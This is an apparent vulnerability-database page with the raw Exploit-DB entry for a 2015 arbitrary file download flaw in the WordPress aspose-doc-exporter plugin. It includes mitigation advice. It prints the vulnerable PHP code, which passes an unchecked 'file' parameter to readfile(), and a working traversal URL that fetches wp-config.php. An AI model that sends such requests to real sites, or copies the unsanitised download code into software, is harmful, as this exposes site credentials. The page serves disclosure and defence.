Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability

vendor:

aspose-doc-exporter Plugin

by:

Ashiyane Digital Security Team

7.5

CVSS

HIGH

Arbitrary File Download

CWE

Product Name: aspose-doc-exporter Plugin

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows, Linux

2015

WordPress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability

The vulnerability allows an attacker to download arbitrary files from the target system by exploiting a flaw in the aspose-doc-exporter plugin for Wordpress. By manipulating the 'file' parameter in the vulnerable PHP script, an attacker can traverse directories and download sensitive files.

Mitigation:

Remove or update the vulnerable plugin. Restrict access to the vulnerable file or sanitize user input to prevent directory traversal attacks.

Source

Exploit-DB raw data:

|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
 |-------------------------------------------------------------------------|
 | [+] Exploit Title:Wordpress aspose-doc-exporter Plugin Arbitrary File Download Vulnerability |
 | [+] Exploit Author: Ashiyane Digital Security Team |
 | [+] Vendor Homepage : https://wordpress.org/plugins/aspose-doc-exporter/developers/
 | [+] Download Link : https://downloads.wordpress.org/plugin/aspose-doc-exporter.zip
 | [+] Tested on: Windows,Linux |
 | [+] Date : 2015-03-28
 | [+] Discovered By : ACC3SS
 |-------------------------------------------------------------------------|
 | [+] Exploit: |
 | [+] Vulnerable file : http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php |
 | [+] Vulnerable Code :

<?php

$file = $_GET['file'];

$file_arr = explode('/',$file);

$file_name = $file_arr[count($file_arr) - 1];

header ("Content-type: octet/stream");

header ("Content-disposition: attachment; filename=".$file_name.";");

header("Content-Length: ".filesize($file));

readfile($file);

exit;

?>


 | [+] http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=[File Address]
 | [+]
 | [+] Examples :  http://localhost/wordpress/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
 |-------------------------------------------------------------------------|
 |*||*||*||*||*||*||*||*||*||*||*||*||*